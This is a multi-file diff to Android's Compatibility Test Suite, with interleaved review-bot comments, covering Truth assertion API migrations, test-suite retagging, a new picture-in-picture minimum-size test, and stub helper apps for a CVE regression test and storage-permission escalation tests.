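Review bot: `onCreate` writes its routine lifecycle trace with `Log.e("CVE", "onCreate")` while every other trace in this test app uses `Log.d`; error level is better kept for failures, so `Log.d("CVE", "onCreate");` fits here. `REQUEST_CAMERA_PERMISSION` and the imports of `PackageManager`, `permission`, `Handler`, `EditText`, `TextView` and `SystemClock` are unused in the class as shown and can be removed. A one-line class comment saying that this activity owns the button which `OverlayActivity` is meant to cover would make the roles of the two activities clear to the next reader.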
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java new file mode 100644 index 00000000000..c320e5a9640 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java @@ -0,0 +1,4 @@ +package android.security.cts.CVE_2021_0305; +import android.app.Activity; + +public class OverlayActivity extends Activity {} diff --git a/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java b/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java index e78e5f32ffc..4186ba16cf1 100644 --- a/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java +++ b/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java @@ -26,10 +26,12 @@ import javax.annotation.Nullable; final class PackageInstallerSessionInfoSubject extends Subject<PackageInstallerSessionInfoSubject, PackageInstaller.SessionInfo> { + private final PackageInstaller.SessionInfo mActual; private PackageInstallerSessionInfoSubject(FailureMetadata failureMetadata, @Nullable PackageInstaller.SessionInfo subject) { super(failureMetadata, subject); + mActual = subject; } private static Subject.Factory<PackageInstallerSessionInfoSubject, 
@@ -50,18 +52,15 @@ final class PackageInstallerSessionInfoSubject extends } public void isStagedSessionReady() { - check().withMessage(failureMessage("in state READY")).that( - getSubject().isStagedSessionReady()).isTrue(); + check(failureMessage("in state READY")).that(mActual.isStagedSessionReady()).isTrue(); } public void isStagedSessionApplied() { - check().withMessage(failureMessage("in state APPLIED")).that( - getSubject().isStagedSessionApplied()).isTrue(); + check(failureMessage("in state APPLIED")).that(mActual.isStagedSessionApplied()).isTrue(); } public void isStagedSessionFailed() { - check().withMessage(failureMessage("in state FAILED")).that( - getSubject().isStagedSessionFailed()).isTrue(); + check(failureMessage("in state FAILED")).that(mActual.isStagedSessionFailed()).isTrue(); } private String failureMessage(String suffix) { @@ -69,12 +68,11 @@ final class PackageInstallerSessionInfoSubject extends } private String subjectAsString() { - PackageInstaller.SessionInfo session = getSubject(); - return "{" + "appPackageName = " + session.getAppPackageName() + "; " - + "sessionId = " + session.getSessionId() + "; " - + "isStagedSessionReady = " + session.isStagedSessionReady() + "; " - + "isStagedSessionApplied = " + session.isStagedSessionApplied() + "; " - + "isStagedSessionFailed = " + session.isStagedSessionFailed() + "; " - + "stagedSessionErrorMessage = " + session.getStagedSessionErrorMessage() + "}"; + return "{" + "appPackageName = " + mActual.getAppPackageName() + "; " + + "sessionId = " + mActual.getSessionId() + "; " + + "isStagedSessionReady = " + mActual.isStagedSessionReady() + "; " + + "isStagedSessionApplied = " + mActual.isStagedSessionApplied() + "; " + + "isStagedSessionFailed = " + mActual.isStagedSessionFailed() + "; " + + "stagedSessionErrorMessage = " + mActual.getStagedSessionErrorMessage() + "}"; } } 
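Review bot: `isStagedSessionReady()`, `isStagedSessionApplied()` and `isStagedSessionFailed()` dereference `mActual` directly, yet the constructor in the preceding hunk declares the subject `@Nullable`. Asserting on a null `SessionInfo` therefore throws a NullPointerException instead of producing a Truth failure, and `subjectAsString()` in the following hunk has the same dependency. Starting each assertion with `isNotNull();` would report the null through the normal failure path.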
diff --git a/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java b/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java index 684f0ec03c3..9f912e0ead3 100644 --- a/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java +++ b/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java @@ -33,6 +33,8 @@ import java.util.List; * Subject for asserting things about RollbackInfo instances. */ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, RollbackInfo> { + private final RollbackInfo mActual; + /** * Asserts something about RollbackInfo. */ @@ -57,27 +59,28 @@ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, Roll private RollbackInfoSubject(FailureMetadata failureMetadata, RollbackInfo subject) { super(failureMetadata, subject); + mActual = subject; } /** * Asserts that the RollbackInfo has given rollbackId. */ public void hasRollbackId(int rollbackId) { - check().that(getSubject().getRollbackId()).isEqualTo(rollbackId); + check("getRollbackId()").that(mActual.getRollbackId()).isEqualTo(rollbackId); } /** * Asserts that the RollbackInfo is for a staged rollback. */ public void isStaged() { - check().that(getSubject().isStaged()).isTrue(); + check("isStaged()").that(mActual.isStaged()).isTrue(); } /** * Asserts that the RollbackInfo is not for a staged rollback. */ public void isNotStaged() { - check().that(getSubject().isStaged()).isFalse(); + check("isStaged()").that(mActual.isStaged()).isFalse(); } /** 
@@ -86,10 +89,10 @@ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, Roll */ public void packagesContainsExactly(Rollback... expected) { List<Rollback> actualPackages = new ArrayList<>(); - for (PackageRollbackInfo info : getSubject().getPackages()) { + for (PackageRollbackInfo info : mActual.getPackages()) { actualPackages.add(new Rollback(info)); } - check().that(actualPackages).containsExactly((Object[]) expected); + check("actualPackages").that(actualPackages).containsExactly((Object[]) expected); } /** @@ -102,6 +105,7 @@ public final class RollbackInfoSubject extends Subject<RollbackInfoSubject, Roll expectedVps.add(cause.getVersionedPackage()); } - check().that(getSubject().getCausePackages()).containsExactlyElementsIn(expectedVps); + check("getCausePackages()").that(mActual.getCausePackages()) + .containsExactlyElementsIn(expectedVps); } } diff --git a/tests/AlarmManager/Android.bp b/tests/AlarmManager/Android.bp index 204f5a3c7f2..14180bcbd5b 100644 --- a/tests/AlarmManager/Android.bp +++ b/tests/AlarmManager/Android.bp @@ -28,6 +28,7 @@ android_test { "cts", "vts10", "general-tests", + "mts-scheduling", ], platform_apis: true, } diff --git a/tests/backup/Android.bp b/tests/backup/Android.bp index e1fcf7f4261..e5fc8bb62ba 100644 --- a/tests/backup/Android.bp +++ b/tests/backup/Android.bp @@ -35,7 +35,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-permission", ], sdk_version: "test_current", } diff --git a/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java b/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java index 9caf3657e7e..b093e6c8d62 100644 --- a/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java +++ b/tests/camera/src/android/hardware/camera2/cts/IdleUidTest.java 
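Review bot: In `packagesContainsExactly`, `check("actualPackages")` labels the derived value with the name of a local variable, whereas the other `check(...)` calls in this file name the accessor on the subject (`"getRollbackId()"`, `"isStaged()"`, `"getCausePackages()"`). The label appears to be used in the failure message to describe how the value was derived from the subject, so `check("getPackages()")` would read consistently with the rest.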
@@ -127,7 +127,7 @@ public final class IdleUidTest extends Camera2ParameterizedTestCase { if (hasAccess) { fail("Unexpected exception" + e); } else { - assertThat(e.getReason()).isSameAs(CameraAccessException.CAMERA_DISABLED); + assertThat(e.getReason()).isSameInstanceAs(CameraAccessException.CAMERA_DISABLED); } } diff --git a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java index 0c9fd40277f..94c92346739 100644 --- a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java +++ b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureConditionTest.java @@ -47,7 +47,7 @@ public class ContentCaptureConditionTest { final ContentCaptureCondition condition = new ContentCaptureCondition(mLocusId, FLAG_IS_REGEX); assertThat(condition).isNotNull(); - assertThat(condition.getLocusId()).isSameAs(mLocusId); - assertThat(condition.getFlags()).isSameAs(FLAG_IS_REGEX); + assertThat(condition.getLocusId()).isSameInstanceAs(mLocusId); + assertThat(condition.getFlags()).isSameInstanceAs(FLAG_IS_REGEX); } } diff --git a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java index 47bd20bc34c..59c61c734de 100644 --- a/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java +++ b/tests/contentcaptureservice/src/android/contentcaptureservice/cts/unit/ContentCaptureContextTest.java 
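Review bot: `assertThat(e.getReason()).isSameInstanceAs(CameraAccessException.CAMERA_DISABLED)` compares two boxed integers by identity, which holds only while both values come from the Integer cache. The intent is a value comparison, so `isEqualTo(CameraAccessException.CAMERA_DISABLED)` is the right assertion. The same applies to `assertThat(condition.getFlags()).isSameInstanceAs(FLAG_IS_REGEX)` in the ContentCaptureConditionTest hunk, assuming `getFlags()` returns an int. The enclosing method in IdleUidTest starts outside the hunk.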
@@ -89,7 +89,7 @@ public class ContentCaptureContextTest { @Test public void testSetGetBundle() { final Builder builder = mBuilder.setExtras(mExtras); - assertThat(builder).isSameAs(mBuilder); + assertThat(builder).isSameInstanceAs(mBuilder); final ContentCaptureContext context = builder.build(); assertThat(context).isNotNull(); assertExtras(context.getExtras()); @@ -99,7 +99,7 @@ public class ContentCaptureContextTest { public void testParcel() { final Builder builder = mBuilder .setExtras(mExtras); - assertThat(builder).isSameAs(mBuilder); + assertThat(builder).isSameInstanceAs(mBuilder); final ContentCaptureContext context = builder.build(); assertEverything(context); diff --git a/tests/framework/base/windowmanager/app/AndroidManifest.xml b/tests/framework/base/windowmanager/app/AndroidManifest.xml index e17658af166..fd55b69fb0a 100755 --- a/tests/framework/base/windowmanager/app/AndroidManifest.xml +++ b/tests/framework/base/windowmanager/app/AndroidManifest.xml @@ -172,6 +172,15 @@ android:minHeight="80dp" /> </activity> + <activity android:name=".PipActivityWithTinyMinimalSize" + android:resizeableActivity="false" + android:supportsPictureInPicture="true" + android:configChanges="orientation|screenSize|smallestScreenSize|screenLayout" + android:exported="true" + android:taskAffinity="nobody.but.PipActivity"> + <layout android:minWidth="1dp" + android:minHeight="1dp"/> + </activity> <activity android:name=".FreeformActivity" android:resizeableActivity="true" android:taskAffinity="nobody.but.FreeformActivity" diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java index d3b5621b77c..dc5aca6c880 100644 --- a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java +++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java 
@@ -79,6 +79,8 @@ public class Components extends ComponentsBase { public static final ComponentName PIP_ACTIVITY2 = component("PipActivity2"); public static final ComponentName PIP_ACTIVITY_WITH_MINIMAL_SIZE = component( "PipActivityWithMinimalSize"); + public static final ComponentName PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE = component( + "PipActivityWithTinyMinimalSize"); public static final ComponentName PIP_ACTIVITY_WITH_SAME_AFFINITY = component("PipActivityWithSameAffinity"); public static final ComponentName PIP_ON_STOP_ACTIVITY = component("PipOnStopActivity"); diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java new file mode 100644 index 00000000000..cd1c625ae3f --- /dev/null +++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java @@ -0,0 +1,24 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License + */ + +package android.server.wm.app; + +/** + * An activity that has the same behavior as {@link PipActivity} and specifies + * minimal dimension in its manifest which is tiny and smaller than the allowed minimum. + */ +public class PipActivityWithTinyMinimalSize extends PipActivity { +} 
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
index 3ac15bb12fb..98e5ff5b874 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
@@ -29,6 +29,7 @@ import static android.server.wm.UiDeviceUtils.pressWindowButton;
 import static android.server.wm.WindowManagerState.STATE_PAUSED;
 import static android.server.wm.WindowManagerState.STATE_RESUMED;
 import static android.server.wm.WindowManagerState.STATE_STOPPED;
+import static android.server.wm.WindowManagerState.dpToPx;
 import static android.server.wm.app.Components.ALWAYS_FOCUSABLE_PIP_ACTIVITY;
 import static android.server.wm.app.Components.LAUNCHING_ACTIVITY;
 import static android.server.wm.app.Components.LAUNCH_ENTER_PIP_ACTIVITY;
@@ -38,6 +39,7 @@ import static android.server.wm.app.Components.PIP_ACTIVITY;
 import static android.server.wm.app.Components.PIP_ACTIVITY2;
 import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_MINIMAL_SIZE;
 import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_SAME_AFFINITY;
+import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE;
 import static android.server.wm.app.Components.PIP_ON_STOP_ACTIVITY;
 import static android.server.wm.app.Components.PipActivity.ACTION_ENTER_PIP;
 import static android.server.wm.app.Components.PipActivity.ACTION_FINISH;
@@ -144,6 +146,8 @@ public class PinnedStackTests extends ActivityManagerTestBase { private static final int MAX_ASPECT_RATIO_NUMERATOR = 239; private static final int MAX_ASPECT_RATIO_DENOMINATOR = 100; private static final int ABOVE_MAX_ASPECT_RATIO_NUMERATOR = MAX_ASPECT_RATIO_NUMERATOR + 1; + // Corresponds to com.android.internal.R.dimen.overridable_minimal_size_pip_resizable_task + private static final int OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK = 48; @Before @Override @@ -250,8 +254,6 @@ public class PinnedStackTests extends ActivityManagerTestBase { assertPinnedStackActivityIsInDisplayBounds(PIP_ACTIVITY); } - // TODO: launch/size pip to a size smaller than limitation and verify the minWidth/minHeight - // is respected after b/149338177. @Test public void testEnterPipWithMinimalSize() throws Exception { // Launch a PiP activity with minimal size specified 
@@ -276,6 +278,29 @@ public class PinnedStackTests extends ActivityManagerTestBase { } @Test + public void testEnterPipWithTinyMinimalSize() throws Exception { + // Launch a PiP activity with minimal size specified and smaller than allowed minimum + launchActivity(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE, EXTRA_ENTER_PIP, "true"); + // Wait for animation complete since we are comparing size + waitForEnterPipAnimationComplete(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE); + assertPinnedStackExists(); + + final WindowManagerState.WindowState windowState = getWindowState( + PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE); + final WindowManagerState.DisplayContent display = mWmState.getDisplay( + windowState.getDisplayId()); + final int overridableMinSize = dpToPx( + OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK, display.getDpi()); + + // compare the bounds to verify that it's no smaller than allowed minimum on both dimensions + final Rect pipBounds = getPinnedStackBounds(); + assertTrue("Pinned task bounds " + pipBounds + " isn't smaller than minimal " + + overridableMinSize + " on both dimensions", + pipBounds.width() >= overridableMinSize + && pipBounds.height() >= overridableMinSize); + } + + @Test public void testEnterPipAspectRatioMin() throws Exception { testEnterPipAspectRatio(MIN_ASPECT_RATIO_NUMERATOR, MIN_ASPECT_RATIO_DENOMINATOR); } diff --git a/tests/libcore/okhttp/Android.bp b/tests/libcore/okhttp/Android.bp index b0f17d2150c..b09108304cb 100644 --- a/tests/libcore/okhttp/Android.bp +++ b/tests/libcore/okhttp/Android.bp @@ -36,7 +36,7 @@ android_test { test_suites: [ "cts", "general-tests", - "mts", + "mts-conscrypt", "vts10", ], java_resources: [":libcore-expectations-knownfailures"], diff --git a/tests/libcore/okhttp/AndroidTest.xml b/tests/libcore/okhttp/AndroidTest.xml index 771293e244e..0907b0a6de8 100644 --- a/tests/libcore/okhttp/AndroidTest.xml +++ b/tests/libcore/okhttp/AndroidTest.xml 
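Review bot: The failure message in `testEnterPipWithTinyMinimalSize` describes the passing condition, so when the assertion fails it reports that the bounds "isn't smaller than minimal", the opposite of what happened. Word it as the failure, e.g. `"Pinned task bounds " + pipBounds + " is smaller than minimal " + overridableMinSize + " on at least one dimension"`. Asserting width and height separately would also show which dimension fell below the enforced minimum.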
@@ -45,4 +45,8 @@ <object type="module_controller" class="com.android.tradefed.testtype.suite.module.TestFailureModuleController"> <option name="screenshot-on-failure" value="false" /> </object> + + <object type="module_controller" class="com.android.tradefed.testtype.suite.module.MainlineTestModuleController"> + <option name="mainline-module-package-name" value="com.google.android.conscrypt" /> + </object> </configuration> diff --git a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java index 974d02ab903..790880b82db 100644 --- a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java +++ b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java @@ -933,6 +933,11 @@ public class SensorDirectReportTest extends SensorTestCase { if (samplingPeriodUs < s.getMinDelay()) { return; } + + if (samplingPeriodUs > s.getMaxDelay()) { + samplingPeriodUs = s.getMaxDelay(); + } + resetEvent(); mChannel = prepareDirectChannel(memType, false /* secondary */); diff --git a/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java b/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java index b3785d8f971..3a035f6c968 100644 --- a/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java +++ b/tests/tests/content/src/android/content/pm/cts/PackageManagerTest.java @@ -669,7 +669,7 @@ public class PackageManagerTest { // Check required permissions List<String> requestedPermissions = Arrays.asList(pkgInfo.requestedPermissions); - assertThat(requestedPermissions).containsAllOf( + assertThat(requestedPermissions).containsAtLeast( "android.permission.MANAGE_ACCOUNTS", "android.permission.ACCESS_NETWORK_STATE", "android.content.cts.permission.TEST_GRANTED"); diff --git a/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java b/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java index 6998103eb84..e4ec38382c3 100644 
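Review bot: The clamp added in the SensorDirectReportTest hunk uses `s.getMaxDelay()` without checking that it is positive. The `Sensor.getMaxDelay()` documentation says older devices may report zero and that zero or negative values should be ignored. On such a sensor this sets `samplingPeriodUs` to 0 or below, which can fall under the `getMinDelay()` bound checked just above. Guard the clamp with `if (s.getMaxDelay() > 0 && samplingPeriodUs > s.getMaxDelay()) {`. The enclosing method starts and ends outside the hunk, so how `samplingPeriodUs` is used afterwards is not visible here.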
--- a/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java +++ b/tests/tests/content/src/android/content/res/cts/AssetManagerTest.java @@ -102,7 +102,7 @@ public class AssetManagerTest { // We don't do an exact match because the framework can add asset files and this test // would be too brittle. - assertThat(files).asList().containsAllOf(fileName, "subdir"); + assertThat(files).asList().containsAtLeast(fileName, "subdir"); files = mAssets.list("subdir"); assertThat(files).isNotNull(); diff --git a/tests/tests/media/Android.bp b/tests/tests/media/Android.bp index 848f004ec9b..6b1797dc74b 100644 --- a/tests/tests/media/Android.bp +++ b/tests/tests/media/Android.bp @@ -77,7 +77,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-media", ], host_required: ["cts-dynamic-config"], min_sdk_version: "29", diff --git a/tests/tests/mediaparser/Android.bp b/tests/tests/mediaparser/Android.bp index 13859a77e10..d9756e832c2 100644 --- a/tests/tests/mediaparser/Android.bp +++ b/tests/tests/mediaparser/Android.bp @@ -19,7 +19,7 @@ android_test { test_suites: [ "cts", "general-tests", - "mts", + "mts-media", ], } diff --git a/tests/tests/mediaparser/AndroidManifest.xml b/tests/tests/mediaparser/AndroidManifest.xml index e3a26e03ce4..f0f6d976423 100644 --- a/tests/tests/mediaparser/AndroidManifest.xml +++ b/tests/tests/mediaparser/AndroidManifest.xml @@ -19,6 +19,8 @@ <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="android.media.mediaparser.cts"> + <uses-sdk android:minSdkVersion="29" + android:targetSdkVersion="29"/> <application> <uses-library android:name="android.test.runner" /> </application> diff --git a/tests/tests/mediastress/Android.bp b/tests/tests/mediastress/Android.bp index 689fec05792..8060b9fe046 100644 --- a/tests/tests/mediastress/Android.bp +++ b/tests/tests/mediastress/Android.bp 
@@ -20,7 +20,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-media", ], // Include both the 32 and 64 bit versions compile_multilib: "both", diff --git a/tests/tests/neuralnetworks/Android.mk b/tests/tests/neuralnetworks/Android.mk index 9928e08127f..3180aaba73f 100644 --- a/tests/tests/neuralnetworks/Android.mk +++ b/tests/tests/neuralnetworks/Android.mk @@ -32,7 +32,7 @@ LOCAL_STATIC_LIBRARIES := libbase_ndk libgtest_ndk_c++ libgmock_ndk LOCAL_CTS_TEST_PACKAGE := android.neuralnetworks # Tag this module as a cts test artifact -LOCAL_COMPATIBILITY_SUITE := cts vts10 mts general-tests +LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks general-tests LOCAL_SDK_VERSION := current LOCAL_NDK_STL_VARIANT := c++_static diff --git a/tests/tests/neuralnetworks/benchmark/Android.mk b/tests/tests/neuralnetworks/benchmark/Android.mk index 9df9c986e16..2207258712a 100644 --- a/tests/tests/neuralnetworks/benchmark/Android.mk +++ b/tests/tests/neuralnetworks/benchmark/Android.mk @@ -27,7 +27,7 @@ LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS) LOCAL_MULTILIB := both # Tag this module as a cts test artifact -LOCAL_COMPATIBILITY_SUITE := cts vts10 mts +LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.rules \ compatibility-device-util-axt ctstestrunner-axt junit NeuralNetworksApiBenchmark_Lib diff --git a/tests/tests/neuralnetworks/tflite_delegate/Android.mk b/tests/tests/neuralnetworks/tflite_delegate/Android.mk index 091a070d691..1bcb0f468b6 100644 --- a/tests/tests/neuralnetworks/tflite_delegate/Android.mk +++ b/tests/tests/neuralnetworks/tflite_delegate/Android.mk 
@@ -66,7 +66,7 @@ LOCAL_STATIC_LIBRARIES := libgtest_ndk_c++ libtflite_static LOCAL_CTS_TEST_PACKAGE := android.neuralnetworks # Tag this module as a cts test artifact -LOCAL_COMPATIBILITY_SUITE := cts vts10 mts general-tests +LOCAL_COMPATIBILITY_SUITE := cts vts10 mts mts-neuralnetworks general-tests LOCAL_SDK_VERSION := current LOCAL_NDK_STL_VARIANT := c++_static diff --git a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp index aabff61b268..8929c43ad46 100644 --- a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp +++ b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp @@ -31,7 +31,7 @@ android_test { "cts", "vts10", "general-tests", - "mts" + "mts-extservices" ], sdk_version: "test_current", target_sdk_version: "29", diff --git a/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java b/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java index 99ea30c6eee..c1172ff255d 100644 --- a/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java +++ b/tests/tests/os/src/android/os/storage/cts/StorageCrateTest.java @@ -314,7 +314,7 @@ public class StorageCrateTest { } String[] newChildDir = mCratesRoot.toFile().list(); - assertThat(newChildDir).asList().containsAllIn(expectedCrates); + assertThat(newChildDir).asList().containsAtLeastElementsIn(expectedCrates); } @Test diff --git a/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java b/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java index 60ede8b7d66..226bb7a2ee8 100644 --- a/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java +++ b/tests/tests/os/src/android/os/storage/cts/StorageStatsManagerTest.java 
@@ -380,17 +380,10 @@ public class StorageStatsManagerTest { assertThat(newCollection.size()).isEqualTo(oldCollection.size() - 1); } - Correspondence<CrateInfo, String> mCorrespondenceByLabel = new Correspondence<>() { - @Override - public boolean compare(CrateInfo crateInfo, String expect) { + Correspondence<CrateInfo, String> mCorrespondenceByLabel = + Correspondence.from((CrateInfo crateInfo, String expect) -> { return TextUtils.equals(crateInfo.getLabel(), expect); - } - - @Override - public String toString() { - return "It should be the crated folder name"; - } - }; + }, "It should be the crated folder name"); @Test public void queryCratesForUid_createDeepPath_shouldCreateOneCrate() diff --git a/tests/tests/packagewatchdog/Android.bp b/tests/tests/packagewatchdog/Android.bp index 8773e4a1fb9..678bda68272 100644 --- a/tests/tests/packagewatchdog/Android.bp +++ b/tests/tests/packagewatchdog/Android.bp @@ -23,7 +23,7 @@ android_test { "vts", "vts10", "general-tests", - "mts" + "mts-extservices" ], libs: ["android.test.base.stubs"], static_libs: [ diff --git a/tests/tests/permission/Android.bp b/tests/tests/permission/Android.bp index c8459cf39b5..607c7a11fd1 100644 --- a/tests/tests/permission/Android.bp +++ b/tests/tests/permission/Android.bp @@ -22,7 +22,7 @@ android_test { "vts10", "general-tests", "sts", - "mts", + "mts-permission", ], // Include both the 32 and 64 bit versions compile_multilib: "both", diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml index 5277c9aff09..66b65602bf3 100644 --- a/tests/tests/permission/AndroidTest.xml +++ b/tests/tests/permission/AndroidTest.xml 
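Review bot: The description passed to `Correspondence.from` for `mCorrespondenceByLabel` is a full sentence carried over from the old `toString()`. Truth splices this string between the actual and the expected element in failure messages, so it should be a verb phrase. Use something like `"has a label equal to"` in place of `"It should be the crated folder name"`. The lambda can also drop its block body: `(crateInfo, expect) -> TextUtils.equals(crateInfo.getLabel(), expect)`.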
@@ -65,6 +65,9 @@ <option name="push" value="CtsInstallPermissionEscalatorApp.apk->/data/local/tmp/cts/permissions/CtsInstallPermissionEscalatorApp.apk" /> <option name="push" value="CtsAppThatRequestsOneTimePermission.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsOneTimePermission.apk" /> <option name="push" value="AppThatDefinesUndefinedPermissionGroupElement.apk->/data/local/tmp/cts/permissions/AppThatDefinesUndefinedPermissionGroupElement.apk" /> + <option name="push" value="CtsStorageEscalationApp28.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp28.apk" /> + <option name="push" value="CtsStorageEscalationApp29Full.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Full.apk" /> + <option name="push" value="CtsStorageEscalationApp29Scoped.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Scoped.apk" /> </target_preparer> <!-- Remove additional apps if installed --> diff --git a/tests/tests/permission/StorageEscalationApp28/Android.bp b/tests/tests/permission/StorageEscalationApp28/Android.bp new file mode 100644 index 00000000000..63fceda30eb --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp28/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp28", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} 
diff --git a/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml new file mode 100644 index 00000000000..f1bd315c630 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="28" android:targetSdkVersion="28" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" /> +</manifest> diff --git a/tests/tests/permission/StorageEscalationApp29Full/Android.bp b/tests/tests/permission/StorageEscalationApp29Full/Android.bp new file mode 100644 index 00000000000..8eb6acb9e07 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Full/Android.bp 
